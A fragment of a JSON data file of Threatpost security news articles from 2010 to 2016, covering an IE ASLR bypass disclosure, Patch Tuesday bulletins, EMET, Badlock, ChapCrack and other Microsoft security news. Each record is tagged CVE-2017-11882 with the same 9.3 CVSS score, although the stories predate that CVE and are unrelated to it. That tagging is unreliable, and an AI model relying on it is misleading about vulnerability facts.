"2014-08-25T18:42:59", "id": "THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "href": "https://threatpost.com/a-new-spin-on-rogue-antivirus/107846/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:42", "description": "Researchers at HP\u2019s Zero Day Initiative have disclosed full details and proof-of-concept exploit code for a series of bugs they discovered that allow attackers to bypass a key exploit mitigation in Internet Explorer.\n\nThe disclosure is a rarity for ZDI. The company typically does not publish complete details and exploit code for the bugs it reports to vendors until after the vulnerabilities are fixed. But in this case, Microsoft has told the researchers that the company doesn\u2019t plan to fix the vulnerabilities, even though the bugs were serous enough to win ZDI\u2019s team a $125,000 [Blue Hat Bonus](<https://threatpost.com/microsoft-launches-100000-bug-bounty-program/101015>) from Microsoft. The reason: Microsoft doesn\u2019t think the vulnerabilities affect enough users.\n\nThe vulnerabilities that the ZDI researchers submitted to Microsoft enable an attacker to fully bypass ASLR (address space layout randomization), one of the many mitigations in IE that help prevent successful exploitation of certain classes of bugs. ZDI reported the bugs to Microsoft last year and disclosed some limited details of them in February. The researchers waited to release the full details until Microsoft fixed all of the flaws, but Microsoft later informed them that they didn\u2019t plan to patch the remaining bugs because they didn\u2019t affect 64-bit systems.\n\n\u201cIn this situation, Microsoft\u2019s statement is technically correct \u2013 64-bit versions do benefit from ASLR more than 32-bit versions. A 64-bit system has a much larger address space than a 32-bit system, which makes ASLR that much more effective. However what is lost here is that the bypass described and submitted only works for 32-bit systems, which is the default configuration on millions of systems. To demonstrate this, we have released proof-of-concept (PoC) code to demonstrate this bypass on Windows 7 and Windows 8.1,\u201d a blog [post](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-and-back-again-a-journey-through-bounty-award-and/ba-p/6756465#.VYgirOs2ItZ>) from Dustin Childs of HP says. \n\nChilds, who is a former Microsoft security official, said ZDI is releasing the details and [PoC code](<https://github.com/thezdi/abusing-silent-mitigations>) in order to give users as much information as possible to defend themselves against potential attacks.\n\n\u201cSince Microsoft feels these issues do not impact a default configuration of IE (thus affecting a large number of customers), it is in their judgment not worth their resources and the potential regression risk. We disagree with that opinion and are releasing the PoC information to the community in the belief that concerned users should be as fully informed as possible in order to take whatever measures they find appropriate for their own installations,\u201d he said.\n\nMicrosoft did not provide a comment in time for publication of this story.\n", "cvss3": {}, "published": "2015-06-22T15:11:28", "type": "threatpost", "title": "HP Releases Details, Exploit Code for Unpatched IE Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-06-25T21:13:37", "id": "THREATPOST:DC91E1B2D30C1A0D1ED78420E79DCE86", "href": "https://threatpost.com/hp-releases-details-exploit-code-for-unpatched-ie-flaws/113408/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:43", "description": "Microsoft will, next week, patch a [zero-day vulnerability in its GDI+ graphics component](<http://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821>) being exploited in targeted attacks in the Middle East and Asia.\n\nThe zero day has sat unpatched since it was made public Nov. 5; Microsoft did release a FixIt tool as a temporary mitigation. The patch is one of 11 bulletins Microsoft said today it will release as part of its [December 2013 Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms13-dec>); five of the bulletins will be rated critical.\n\nMicrosoft did confirm, however, that a [zero day in the NDProxy driver](<http://threatpost.com/latest-xp-zero-day-renews-calls-to-move-off-the-os/103058>) that manages the Microsoft Telephony API on Windows XP systems will not be patched. That zero day is also being exploited in the wild alongside a PDF exploit of a patched Adobe Reader flaw.\n\nThe GDI+ vulnerability is found in several versions of Windows and Office and enables an attacker to gain remote-code execution, but only on Windows Vista, Windows Server 2008, and Office 2003 through 2010. The vulnerability exists in the way the GDI+ component handles TIFF images. Microsoft said an attacker would have to entice a victim to preview or open a malicious TIFF attachment or visit a website hosting the exploit image.\n\nTuesday\u2019s critical patches address remote code execution vulnerabilities in a number of Microsoft products, including not only Windows and Office, but Lync, Internet Explorer and Exchange. Vulnerabilities in SharePoint, Lync, SingnalR and ASP.NET are among those rated important by Microsoft. Those vulnerabilities are primarily privilege escalation issues as well as an information disclosure bug.\n\nThis will be the last scheduled release of security updates from Microsoft for the year. It looks like Tuesday\u2019s updates will bring the 2013 count to 106 bulletins, up sharply from 83 last year, according to Qualys CTO Wolfgang Kandek. Microsoft had similar numbers of bulletins in 2011 (100) and 2010 (106).\n\n\u201cRegarding 0-days, Microsoft has consistently pointed out that the additional security toolkit EMET (Enhanced Mitigation Experience Toolkit) has been effective against all of the 0-day problems this year,\u201d Kandek said. \u201cWe believe it is a proactive security measure that organizations should evaluate and consider as an additional layer in their defensive measures.\u201d\n\nThe XP zero-day, meanwhile, will likely be left for the January 2014 Patch Tuesday updates. The vulnerability is a privilege escalation vulnerability and allows kernel access.\n\nFireEye researchers said they found the exploit in the wild being used [alongside a PDF-based exploit](<http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html>) against a patched Adobe Reader vulnerability. Reader versions 9.5.4, 10.1.6, 11.0.02 and earlier on XP SP3 are affected, later versions are not, FireEye said, adding that this exploit gives a local user the ability to execute code in the kernel, such as install new software, manipulate data, or create new accounts. The exploit cannot be used remotely, the company said.\n\nMicrosoft recommended deleting the NDProxy.sys driver as a workaround; the mitigation, however, will impact TAPI operations.\n\n\u201cSystem administrators everywhere must have made Microsoft\u2019s naughty list because this holiday \u2018gift\u2019 is clearly a lump of coal,\u201d said Tyler Reguly, technical manager of security research and development at Tripwire. \u201cMicrosoft is wrapping up the 2013 patch season with anything that was laying around. Someone should tell Microsoft they forgot to include the kitchen sink.\u201d\n", "cvss3": {}, "published": "2013-12-05T16:07:42", "type": "threatpost", "title": "TIFF Zero Day Patch Among December 2013 Microsoft updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-12-05T21:07:43", "id": "THREATPOST:1256E9A9997A1C51E9DB7AEB7A420D3D", "href": "https://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:14", "description": "[](<https://threatpost.com/microsoft-unveils-new-windows-defender-offline-tool-120911/>)Microsoft has released a beta version of a new tool that can help victims of malware attacks recover from ugly infections, even if they don\u2019t have the ability to reach the Internet. The Windows Defender Offline tool enables users to clean their systems of malware from a CD or other removable media.\n\nIn some ways, the new tool is a throwback to the bygone days of computing and viruses when the malware universe was small enough that all of the definitions to combat it could fit on a floppy disk. Back then, users would often have a rescue disk that could help them boot their PC in the event of a messy malware infestation. Microsoft\u2019s [Windows Defender Offline](<http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline>) uses the same idea, by enabling users to download a large definition file and then transfer it to a USB drive, CD or other portable medium.\n\nThere are some pernicious classes of malware, including some rootkits and ransomware programs, that will prevent users from accessing the Internet or doing any kind of normal operations on their PCs. In those cases, it can be difficult or impossible for a user to run a system scan with installed antimalware applications or run a scan from the Web.\n\nA user who finds herself in such a situation would be able to boot her PC from the CD or USB driver containing the offline tool and then proceed with the malware cleaning.\n\n\u201cWindows Defender Offline Beta can help remove such hard to find malicious and potentially unwanted programs using definitions that recognize threats. Definitions are files that provide an encyclopedia of potential software threats. Because new threats appear daily, it\u2019s important to always have the most up-to-date definitions installed in Windows Defender Offline Beta. Armed with definition files, Windows Defender Offline Beta can detect malicious and potentially unwanted software, and then notify you of the risks,\u201d Microsoft\u2019s documentation for the Windows Defender Offline tool says.\n\nThe new tool is currently in beta form, but it\u2019s available for download from Microsoft\u2019s site now.\n", "cvss3": {}, "published": "2011-12-09T12:57:19", "type": "threatpost", "title": "Microsoft Unveils New Windows Defender Offline Tool", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:11", "id": "THREATPOST:2E13C5A3F37F020F188FBBE61F9209BC", "href": "https://threatpost.com/microsoft-unveils-new-windows-defender-offline-tool-120911/75979/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:19", "description": "SAN FRANCISCO \u2013 Enterprises beat up by wave after wave of Java exploits and calls to disable the platform may soon have some relief in sight.\n\nMicrosoft\u2019s free Enhanced Mitigation Experience Toolkit will soon have a new feature that allows users to configure where plug-ins, especially those targeted by hackers such as Java and Adobe Flash, are allowed to run by default. The feature is called Attack Surface Reduction, and it\u2019s one of two that Microsoft has made available in a [technical preview of EMET 5.0](<http://blogs.technet.com/b/srd/archive/2014/02/21/announcing-emet-5-0-technical-preview.aspx>) released today at RSA Conference 2014.\n\n\u201cASR is going to help a lot of people,\u201d said Microsoft software security engineer Jonathan Ness.\n\nBlocking Java outright, despite some of the dire attacks reported during the past 15 months, isn\u2019t an option for most companies that have built custom Java applications for critical processes such as payroll or human resources. With 5.0, users will have the option to run plug-ins in the Intranet zone while blocking them in the browser\u2019s Internet zone, or vice-versa.\n\n\u201cIt gives customers more control over how plug-ins are loaded into applications,\u201d said Ness, explaining users will have the flexibility, for example, to allow Flash to load in a browser, but block it in an Office application such as Word or Excel. A number of advanced attacks have contained malicious embedded Flash files inside benign Word documents or Excel spreadsheets. Microsoft hopes to use feedback received on the Technical Preview to shape the final 5.0 product.\n\n\u201cFeedback is really valuable, and has helped shape this tool,\u201d Ness said, adding that the release of EMET 4.1 was delayed right before launch to correct a shortcoming pointed out by a beta user. The customer was not pleased with EMET\u2019s automatic termination of applications upon detecting an exploit, rather than having a configuration option available where the event could be logged an analyzed later.\n\nMicrosoft has been vocal about recommending EMET as a temporary mitigation for zero-day attacks against previously unreported vulnerabilities. EMET includes a dozen mitigations that block exploit attempts targeting memory vulnerabilities. Most of the mitigations are for return-oriented programming exploits, in addition to memory-based mitigations ASLR, DEP, heap spray and SEHOP protections. EMET is not meant as a permanent fix, but only as a stopgap until a patch is ready for rollout.\n\nThe second new feature in the EMET 5.0 Technical Preview is a number of enhanced capabilities to Export Address Table Filtering, or EAF+. Ness said EAF+ blocks how shellcode calls are made into EA table filtering.\n\n\u201cWith OS functions such as open file or create process, exported code wants to jump into EAF. This filters the shellcode and blocks it if it\u2019s an exploit,\u201d Ness said. \u201cWe\u2019re extending that with new filtering (KERNELBASE exports and additional integrity checks on stack registers and limits).\u201d\n\nEMET raises development costs for exploit writers with its memory protections, so much so that the recent Operation SnowMan APT attack included a module that detected whether an EMET library was present and if so, the exploit would not execute itself. Researchers have developed bypasses of EMET\u2019s mitigations, first Aaron Portnoy of Exodus Intelligence last summer, and most recently, researchers at Bromium Labs who developed a complete EMET bypass.\n\nMicrosoft\u2019s Ness said improvements to EMET\u2019s Deep Hooks API protections have been rolled into the 5.0 Technical Preview that address the Bromium bypass. Whether it remains on by default in the final 5.0 remains to be seen as application compatibility issues have to be resolved first, Ness said.\n", "cvss3": {}, "published": "2014-02-25T16:37:11", "type": "threatpost", "title": "Microsoft EMET 5.0 Technical Preview Released", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-25T21:37:11", "id": "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "href": "https://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:22", "description": "Another month, another set of [Microsoft Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms13-aug>) for Internet Explorer.\n\nFor what seems to be the umpteenth month in a row, Microsoft will patch its browser, one of three critical updates expected to be shipped on Tuesday among eight bulletins.\n\nWhile IE patches remain a constant in 2013, IT administrators and network managers also need to be aware of a critical set of patches for Microsoft Exchange Server 2013, as well as 2010 and 2007, both of which are on Service Pack 3.\n\nThe critical bugs in IE, Exchange Server and the Windows OS are all rated critical because they are remotely exploitable; it\u2019s unknown today how many are being actively exploited.\n\n\u201cAcross the board, all supported versions of Microsoft Exchange Server are affected by a critical vulnerability,\u201d said Tripwire security researcher Craig Young. \u201cIf I remember correctly, the last time we saw this was back in February when it was revealed that the transcoding service used to render content for Outlook Web Access sessions could be abused for remote code execution in the context of that service. Exchange servers are invariably connected to the Internet in some form or another so it\u2019s going to be urgent to patch this one post-haste.\u201d\n\n[MS13-012](<http://technet.microsoft.com/en-us/security/bulletin/ms13-012>), released in February, patched [vulnerabilities in the Exchange WebReady Document Viewing](<http://threatpost.com/microsoft-patches-critical-ie-vulnerabilities-021213/77519>) feature; if a user viewed a malicious file through OWA in a browser, an attacker could run code on the Exchange server remotely or crash the server.\n\nRoss Barrett, senior manager of security engineering at Rapid7, said the Exchange patches should be of the greatest concern to organizations.\n\n\u201cIf this is truly a remotely exploitable issue that does not require user interaction, then it\u2019s a potentially wormable issue and definitely should be put at the top of the patching priority list,\u201d Barrett said.\n\nIE, meanwhile, is about to be patched for the eighth time this year including an [out-of-band patch](<http://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/77403>) in January to address exploits being used in a number of watering hole attacks.\n\nThe third critical bulletin addresses vulnerabilities in Windows XP and Windows Server 2003 that are remotely exploitable.\n\n\u201cFor some organizations this patch may be of less concern, if they have already moved to newer Windows versions,\u201d Barrett said.\n\nThe remaining bulletins are rated \u201cImportant\u201d by Microsoft based on whether they are remotely exploitable and whether exploits are in the wild. All of the \u201cImportant\u201d bulletins patch vulnerabilities in Windows; two of them are privilege escalation bugs, two are denial-of-service vulnerabilities and one information disclosure flaw.\n", "cvss3": {}, "published": "2013-08-08T15:28:06", "type": "threatpost", "title": "August 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-16T18:07:04", "id": "THREATPOST:4C788DAABFE70AE1D1483D4039B3767E", "href": "https://threatpost.com/critical-ie-exchange-updates-on-tap-in-august-patch-tuesday-release/101943/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:35", "description": "Despite the [Badlock hype machine](<https://threatpost.com/badlock-vulnerability-falls-flat-against-its-hype/117349/>) cranked up high, we don\u2019t know much about this impending soul-crushing vulnerability other than it could be bad, it could be in the Windows Server Message Block and it already has its own requisite logo and website.\n\nNonetheless, we have a little more than two weeks before the next Microsoft Patch Tuesday on April 12 to speculate, guess and fear what might come first: the patch or a public exploit.\n\nStefan Metzmacher, a member of the Samba team and an employee with German consultancy SerNet, is credited with finding the bug and said both Samba and Windows will be patched. He said deductive reasoning leads us to consider that the bug might be in Server Message Block (SMB). Samba is an open source SMB implementation.\n\nBug hunters, good and bad, are surely on the case and some have already found what could be a juicy clue in one of Metzmacher\u2019s [commits to git.samba.org](<https://git.samba.org/?p=samba.git;a=blob;f=source4/libcli/smb2/lock.c;h=f2a76d876a103ce0dd06a5b362c2e629974772d5;hb=HEAD>). Metzmacher is the author of the lock.c file in Samba\u2014it handles SMB2 client lock handling\u2014and within a particular commit he includes a comment: \u201d /* this is quite bizarre \u2013 the spec says we must lie about the length! */\u201d\n\nThere\u2019s no confirmation this is the bug, but one researcher told Threatpost that the comment indicates that there are places in the protocol where the size of a string would be misrepresented. This could lead to serious errors because a developer could use the size to allocate space in a buffer, which is fine if the number is accurate. But if the length is a \u201clie\u201d as Metzmacher says, and you copy more bytes than there is room allocated, you have a buffer overrun and code execution.\n\nWhether this is enough information there for an exploit writer to craft something nasty in the next two weeks remains to be seen. One thing is for certain, however: defenders will sway in the wind for the next 15 days.\n\n\u201cA skilled exploit writer may have enough information to write an exploit based on this information. On the other hand, as a defender, I am missing some details,\u201d said Johannes Ullrich, dean of research at the SANS Institute and director of the SANS Internet Storm Center. \u201cFor example, it would be nice to know if this affects servers only, or clients as well. Which network ports and which SMB version are affected? These are things that would help defenders, but they are missing from the advisory.\u201d\n\nThe [Badlock website](<http://badlock.org/>) isn\u2019t helpful on details either, other than to say that patches will be available for Samba 4.4, 4.3 and 4.2; it cautions that since Samba 4.4.0 was released March 22, Samba 4.1 will no longer be supported.\n\nThe SANS website, meanwhile, cautions that UNIX administrators need to pay attention to the details once they\u2019re made public, and suggest [scanning environments](<https://isc.sans.edu/diary/Getting+Ready+for+Badlock/20877>) for servers with SMB enabled; it\u2019s expected that UNIX implementations would also patch on or around the April 12.\n\nIn the meantime, the situation has also stirred up a healthy debate over whether big bugs are being trivialized, not only by self-serving advanced notification, but also by websites and branding with logos.\n\nFrom Badlock.org:\n\n> \u201cThe main goal of this announcement is to give a heads up and to get you ready to patch all systems as fast as possible and have sysadmin resources available on the day the patch will be released. Vendors and distributors of Samba are being informed before a security fix is released in any case. This is part of any Samba security release process.\n> \n> Weighting to the respective interests of advance warning and utmost secrecy we chose to warn you beforehand, so that everyone has a chance to be ready to install the fixes as soon as they are available. Once the patch is released to the public, it will point to attack vectors and exploits will be in the wild in no time.\u201d\n\nMicrosoft has chosen not to add anything to the discussion; a representative told Threatpost: \u201cUnfortunately, Microsoft doesn\u2019t have anything to share.\u201d Sernet CEO Johannes Loxen refused to comment further in an email to Threatpost beyond what is on the badlock.org side. Loxen did concede in a tweet that the advanced notification on the bug is self-serving in terms of marketing and attention toward his company. The tweets have since been deleted.\n\nDan Kaminsky, whose 2008 DNS vulnerability and patch coordination is largely considered the first of its kind, was critical of the hype. He told _Wired_ that this [type of disclosure](<http://www.wired.com/2016/03/hype-around-mysterious-badlock-bug-raises-criticism/>) isn\u2019t helpful to admins. \u201cWhat\u2019s the call to action other than to pay attention?\u201d\n\nAndrew Storms, vice president of security services at New Context, recalled the angst for some around Microsoft\u2019s decision of last January to discontinue Patch Tuesday advanced notification and limit it only to [paying Premier customers](<https://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294/>).\n\n\u201cI\u2019ve always been a proponent of the advanced notification. And I was one of the people upset when Microsoft closed up ANS. That few days of heads up gives managers a chance to prep resources,\u201d Storms said. \u201cWhether that\u2019s people or servers or test systems, I\u2019ve always contended that some heads up is better than the big surprise disruption.\u201d\n\nSANS\u2019 Ullrich said advanced notification allows for preparation in areas such as inventories of vulnerable systems, counter measures and configuration options, all of which speed up patching. \n\u201c\u2018Branded\u2019 vulnerabilities are likely patched faster and more organizations will patch them given the attention paid to them (it would be nice to collect some hard numbers on this, but I haven\u2019t seen any studies to that effect yet),\u201d Ullrich said. \u201cOn the other hand, \u2018branded\u2019 vulnerabilities should be reserved for the most severe vulnerabilities. In that way, we will have to see if this vulnerability does meet that threshold.\u201d\n", "cvss3": {}, "published": "2016-03-28T11:45:05", "type": "threatpost", "title": "Badlock Bug in Samba SMB Protocol", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-04-12T18:50:16", "id": "THREATPOST:40C7024941C4F0096D439BD79BF49C6D", "href": "https://threatpost.com/badlock-vulnerability-clues-few-and-far-between/117008/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:02", "description": "Microsoft announced Wednesday it will tweak the release of its forthcoming Windows 8 operating system to comply with the European Commission, which argues that in its current state, the software fails to offer customers a browser choice screen to let them \u201ceasily choose their preferred web browser.\u201d\n\nThe browser choice issue was also present in Windows 7 and according to the European Union antitrust commissioner Joaquin Almunia this morning, the EU has been in contact with Microsoft to ensure it doesn\u2019t repeat the same mistake.\n\nAccording to reports, Microsoft was advised to remedy the issue \u201cif they don\u2019t want to take the risk of a new investigation,\u201d Almunia [warned at press conference earlier today](<http://www.google.com/hostednews/afp/article/ALeqM5iXITc3iybCliakA7TZ496XmzPS5g?docId=CNG.8bb0ab94569c4cff3a09e64804358eaa.441>).\n\nThe EU initially took issue that Microsoft\u2019s Windows 7 Service Pack 1, released in February 2011, failed to offer users a choice, something the company has been legally bound to do in Europe since December 2009. After that ruling, the EU mandated that Microsoft display a choice screen to \u201caddress competition concerns.\u201d While the choice screen popped up in March 2010 as part of a five year agreement, from February 2011 to July 2012, the \u201cchoice screen\u201d disappeared from Windows.\n\n\u201cIf infringements are confirmed, Microsoft should expect sanctions,\u201d [Almunia warned in July](<http://europa.eu/rapid/press-release_IP-12-800_en.htm?locale=en>), when proceedings against Microsoft over the most recent issue were opened.\n\nMicrosoft claimed the lack of a \u201cchoice screen\u201d was a due to a technical error and claims it has taken steps to ensure the problem doesn\u2019t happen again. It will implement changes to Windows 8 before its release later this week, [the company acknowledged in a press release today](<http://www.microsoft.com/en-us/news/Press/2012/Oct12/10-24statement.aspx>).\n\nIn the U.S., Windows 8 is slated for release on Friday, while a tweaked version, Windows 8 Pro N will be released in Europe without Windows Media Player. Similar to the browser choice ruling, the EU ruled in 2004\u2019s \u201cMicrosoft competition case,\u201d that tying the player to Windows was an \u201cabuse of a dominant position.\u201d In response, the Microsoft had to release a version of its Windows software [with its flagship media player stripped out](<http://www.law.yale.edu/documents/pdf/The_Economists_Voice.pdf>). (.PDF)\n\nThe EU is known for taking a tougher stance toward user privacy than the U.S., along with enforcing its competition law \u2014 a law that is effectively the equivalent of the U.S.\u2019s antitrust law. The commission fined Microsoft twice, [in 2004 and 2008](<http://news.bbc.co.uk/2/hi/business/7266629.stm>) after it determined it had gained unfair market advantage with its Windows platform. \n", "cvss3": {}, "published": "2012-10-24T19:01:05", "type": "threatpost", "title": "Microsoft Agrees to Modify Windows 8 Following EU Complaint", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:20", "id": "THREATPOST:61AC6ABD7798785567FFEEBEF573CDF8", "href": "https://threatpost.com/microsoft-agrees-modify-windows-8-following-eu-complaint-102412/77151/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:24", "description": "Microsoft is warning customers about the availability of the [ChapCrack tool that Moxie Marlinspike built](<https://threatpost.com/new-tool-moxie-marlinspike-cracks-some-crypto-passwords-073012/>) to crack the VPN credentials for systems built on MS-CHAPv2 protocol. The company said that while it\u2019s not aware of any active attacks using the tool, customers can protect themselves by implementing PEAP or changing to a more secure VPN tunnel.\n\nMarlinspike unveiled the ChapCrack tool at DEF CON last month, and it\u2019s designed to take packet captures from sessions using the MS-CHAPv2 protocol and strip out the user\u2019s credentials from the cryptographic handshake in the session. In order to decrypt the user\u2019s credentials, Marlinspike submits the packet to CloudCracker, which sends back a packet that he can put back into ChapCrack, which then will crack the password.\n\nIn its advisory, Microsoft says that while the ChapCrack tool doesn\u2019t take advantage of a security vulnerability per se, it still represents a risk to users.\n\n\u201cAn attacker who successfully exploited these cryptographic weaknesses could obtain user credentials. Those credentials could then be re-used to authenticate the attacker to network resources, and the attacker could take any action that the user could take on that network resource,\u201d the company said in its [advisory on ChapCrack](<http://technet.microsoft.com/en-us/security/advisory/2743314>).\n\n\u201cAn attacker has to be able to intercept the victim\u2019s MS-CHAP v2 handshake in order to exploit this weakness, by performing man-in-the-middle attacks or by intercepting open wireless traffic. An attacker who obtained the MS-CHAP v2 authentication traffic could then use the exploit code to decrypt a user\u2019s credentials.\u201d\n\nMicrosoft recommends that customers who use MS-CHAPv2 implement PEAP (protected extensible authentication protocol) to further secure their VPNs. \n", "cvss3": {}, "published": "2012-08-20T19:11:41", "type": "threatpost", "title": "Microsoft Warns Users About ChapCrack Tool Availability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:41", "id": "THREATPOST:70B08FC40DE9224ACE3D689EE22897C0", "href": "https://threatpost.com/microsoft-warns-users-about-chapcrack-tool-availability-082012/76929/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:46", "description": "[ \n \n](<http://go.microsoft.com/fwlink/?LinkID=124807>)\n\nJonathan Ness of Microsoft\u2019s Security Research and Defense team explains the inner workings of the Data Execution Prevention technology that can help mitigate the [targeted attacks exploiting the vulnerability in Internet Explorer](<https://threatpost.com/how-dep-can-mitigate-ie-zero-day-attacks-011910/>) right now.\n", "cvss3": {}, "published": "2010-01-19T14:32:51", "type": "threatpost", "title": "How DEP Can Mitigate IE Zero-Day Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:06", "id": "THREATPOST:1B56CE326878B69FFA20FFC20DB62365", "href": "https://threatpost.com/how-dep-can-mitigate-ie-zero-day-attacks-011910/73391/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:11", "description": "The [Operation SnowMan espionage campaign](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>), which targeted military intelligence earlier this year via an Internet Explorer zero day, exposed a weak spot in Microsoft\u2019s vulnerability management efforts. What was unique about the SnowMan operation is that it included a check as to whether the compromised computer was running [Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET)](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>), and if so, the attack would not execute.\n\nAs it turns out, attackers were taking advantage of an information disclosure bug that revealed whether EMET and other antimalware protections were active. Today, Microsoft took steps to close that gap in its latest cumulative update for IE.\n\nThe critical patch is one of four released today by Microsoft as part of its monthly [Patch Tuesday security bulletins](<https://technet.microsoft.com/library/security/ms14-sep>). The IE update patches 37 vulnerabilities, including the publicly known disclosure bug. The three remaining bulletins for .NET, Windows Task Scheduler, and Microsoft Lync, were rated important by Microsoft and likely don\u2019t result in remote code execution.\n\nEMET is a free toolkit provided by Microsoft that midmarket and enterprise IT shops can deploy as a temporary stopgap for a zero-day vulnerability being exploited in the wild. The toolkit provides a host of exploit mitigations that protect against common memory corruption vulnerabilities. The vulnerability patched in IE allows resources loaded into memory to be queried, Microsoft said, giving attacker a head\u2019s up as to what protections are running on a machine.\n\nThe IE patch, MS14-052, is the highest priority bulletin for IT shops this month, experts said.\n\nThe IE patch, [MS14-052](<https://technet.microsoft.com/library/security/MS14-052>), is the highest priority bulletin for IT shops this month, experts said.\n\n\u201cThis patch is Microsoft\u2019s attempt to limit the capability of exploit kits that have been identified as using an information disclosure technique to determine if particular security software were installed,\u201d said Craig Young, a security researcher with Tripwire. \u201cThe flaw allows a malicious website to determine if a software package is installed by querying the availability of a DLL used by that software. Information regarding active security products on a target is very useful for an attacker; it allows them to avoid raising alarms by sending detectable payloads.\u201d\n\nThe update also patches vulnerabilities in the browser going back to IE6 running on Windows Server through current versions.\n\nThe next bulletin worth watching, experts said, is [MS14-054](<https://technet.microsoft.com/library/security/MS14-054>), a privilege escalation vulnerability in Task Scheduler. In order to exploit the bug, an attacker would need to have valid credentials and local access to an affected system in order to run their exploit.\n\nThe vulnerability affects Windows 8, Windows 8.1, Windows RT and Windows RT 8.1, as well as Windows Server 2012 and Windows Server 2012 R2.\n\n\u201cMS14-054 should also be high on IT admins patch list as Microsoft expects to see reliable task scheduler exploits developed within a month,\u201d Young said. \u201cSuccessful exploitation of this vulnerability would allow any user to take complete control of the affected system.\u201d\n\nMicrosoft also patched a denial-of-service vulnerability in its .NET framework. [MS14-053](<https://technet.microsoft.com/library/security/MS14-053>) affects most versions of .NET, and also affects ASP.NET installations if it\u2019s enabled on IIS.\n\n\u201cIf left unpatched, remote un-authenticated attackers can send HTTP/HTTPs request to cause resource exhaustion which will ultimately lead to deal-of-service condition on the ASP.NET web server,\u201d said Amol Sarwate, director of vulnerability labs at Qualys.\n\nThe final bulletin, [MS14-055](<https://technet.microsoft.com/library/security/MS14-055>), patches three denial-of-service vulnerabilities in Microsoft\u2019s messaging server, Lync.\n\n\u201cThe security update addresses the vulnerabilities by correcting the way Lync Server sanitizes user input and by correcting the way Lync Server handles exceptions and null dereferences,\u201d Microsoft said in its advisory.\n\nMicrosoft also updated three security advisories today:\n\n * [Advisory 2871997](<https://technet.microsoft.com/library/security/2871997.aspx>) updates credential protection and domain authentication controls for Windows 7 and Windows Server 2008 R2. The update ensures credentials are cleaned up immediately rather than when a new Kerberos TGT ticket has been obtained.\n * [Advisory 2905247](<https://technet.microsoft.com/library/security/2905247.aspx>) is an update for Microsoft ASP.NET that patches a privilege elevation vulnerability in an ASP.NET view state that that was made available last December. As of today\u2019s update, the security update is available via Microsoft Update in addition to the Download-Center-only option provided in December.\n * [Advisory 2755801](<https://technet.microsoft.com/en-us/library/security/2755801.aspx>) is an update for Adobe Flash Player in Internet Explorer versions running on Windows 8 and Windows 8.1. Today\u2019s update is for IE 10 on Windows 8, Windows Server 2012 and Windows RT, and IE 11 on Windows 8.1, Windows Server 2012 R2 and Windows RT 8.1.\n", "cvss3": {}, "published": "2014-09-09T14:40:33", "type": "threatpost", "title": "September 2014 Microsoft Patch Tuesday security bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-09T18:40:33", "id": 